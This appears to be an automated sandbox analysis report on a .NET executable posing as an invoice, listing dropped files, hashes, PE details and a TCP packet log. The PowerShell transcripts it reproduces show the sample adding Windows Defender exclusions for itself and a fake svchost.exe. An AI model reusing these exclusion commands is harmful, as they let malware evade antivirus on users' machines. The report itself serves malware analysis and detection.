                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074612..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..Process ID: 6496..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074612..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074930..Username: DES
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.qwyL+J44.20210222074529.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5887
                                                                                                                                                            Entropy (8bit):5.4334456255694334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:BZo/ENFqDo1ZFZp/ENFqDo1ZTEq8jZ2/ENFqDo1ZMdMM+Zp:L
                                                                                                                                                            MD5:274E43453E3E88555157553FE6D0202B
                                                                                                                                                            SHA1:DF744448D16DF272AF8857B4A78614518E35B48F
                                                                                                                                                            SHA-256:C457120A2A84A04022230A207CC32A1A900E7373C714A5FB86787FC1532138C7
                                                                                                                                                            SHA-512:4D3B043CAADAEB1F9368239D53DC5AC3857BE0B1DF49F81B3FD29C1A89AB4B0158A99A96C816B1608F066FD327D3FE27F22BC29449F31B142868400B049E0D5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074543..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..Process ID: 1552..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074544..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074917..Username: DESKTOP
                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.522318927512162
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File size:206848
                                                                                                                                                            MD5:a656f522f604872e02daee9dbc458d9c
                                                                                                                                                            SHA1:e463d219a1d4dbde375e4f53c2fc250d6ee9d7f1
                                                                                                                                                            SHA256:a0ebcb3078763eb8acca534831ef9ca1a213347328698aa3cda7c5bd23cd81d8
                                                                                                                                                            SHA512:6d13f052bc55d278b3d6a2b0ddd286572d9e45e96fbb8f52f64847b5c93b4e7c21edcbd2e42ccd096a660c86e1bafec84dd45c41195fa0c3533ae1bd1e82d9ca
                                                                                                                                                            SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..n............... ........@.. ..............................4.....@................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:68c6a6ce96b28acc

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x408c1e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                            Time Stamp:0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:
                                                                                                                                                            Signature Issuer:
                                                                                                                                                            Signature Validation Error:
                                                                                                                                                            Error Number:
                                                                                                                                                            Not Before, Not After
                                                                                                                                                              Subject Chain
                                                                                                                                                                Version:
                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                Serial:

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8bc40x57.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x2b588.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x76000x18d0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x20000x6c240x6e00False0.569140625data6.79874313495IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0xa0000x2b5880x2b600False0.209018146614data5.11613599297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x360000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                RT_ICON0xa2680x3751PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                RT_ICON0xd9bc0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                RT_ICON0x1e1e40x94a8data
                                                                                                                                                                RT_ICON0x2768c0x5488data
                                                                                                                                                                RT_ICON0x2cb140x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4286513152
                                                                                                                                                                RT_ICON0x30d3c0x25a8data
                                                                                                                                                                RT_ICON0x332e40x10a8data
                                                                                                                                                                RT_ICON0x3438c0x988data
                                                                                                                                                                RT_ICON0x34d140x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                RT_GROUP_ICON0x3517c0x84data
                                                                                                                                                                RT_VERSION0x352000x388dataEnglishUnited States

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                Version Infos

                                                                                                                                                                DescriptionData
                                                                                                                                                                LegalCopyrightCopyright 2022 KRJLJBgt. All rights reserved.
                                                                                                                                                                Assembly Version2.1.1.0
                                                                                                                                                                InternalNameWgjnHXED.exe
                                                                                                                                                                FileVersion6.1.7.5
                                                                                                                                                                CompanyNameUoiZpnTq
                                                                                                                                                                LegalTrademarksWOAkEmIy
                                                                                                                                                                CommentsHzWOHjaz
                                                                                                                                                                ProductNameWgjnHXED
                                                                                                                                                                ProductVersion2.1.1.0
                                                                                                                                                                FileDescriptionEsCOzVNx
                                                                                                                                                                OriginalFilenameWgjnHXED.exe
                                                                                                                                                                Translation0x0409 0x0514

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                02/22/21-07:46:08.953744ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Feb 22, 2021 07:45:11.793998003 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.842531919 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.846292019 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.848449945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.895890951 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936095953 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936125040 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936142921 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936156034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936171055 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936191082 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936222076 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936239958 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936244965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.936253071 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936270952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936302900 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.936331987 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.937458038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.937479019 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.937566042 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.938664913 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.938683987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.938755035 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.939884901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939903975 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939977884 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.941148996 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941168070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941394091 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.942347050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942368031 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942471027 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.943555117 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943578005 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943675041 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.944773912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944794893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944883108 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.946001053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946021080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946131945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.947248936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947268009 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947340965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.948430061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.948451042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.949225903 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.983365059 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983387947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983474970 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.984009027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984028101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984107018 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.985220909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985240936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985347033 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.986469030 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986490011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986612082 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.987646103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987665892 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987770081 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.988883972 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989492893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989516020 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989593983 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.990787029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990806103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990874052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.991934061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.991952896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.992037058 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.993166924 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993189096 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993376017 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.994384050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994410992 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994533062 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.995600939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995642900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995759010 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.996803999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996829987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996916056 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.998044968 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998073101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998131990 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.999262094 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999283075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999356031 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.000473022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000495911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000590086 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.001709938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001735926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001804113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.002914906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.003146887 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.003513098 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.003534079 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.003587008 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.004744053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.004769087 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.004859924 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.005971909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.005997896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.006068945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.007220984 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.007256031 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.007335901 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.008388042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.008413076 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.008498907 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.009618044 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.009641886 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.009700060 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.010838032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.010862112 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.010935068 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.030915022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.030942917 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.031054974 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.031367064 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.031384945 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.031461954 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.032460928 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.032483101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.032546043 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.033792973 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.033814907 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.033910036 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.035150051 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.036809921 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.036832094 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.036902905 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.037293911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.037313938 CET8049715104.21.71.230192.168.2.5
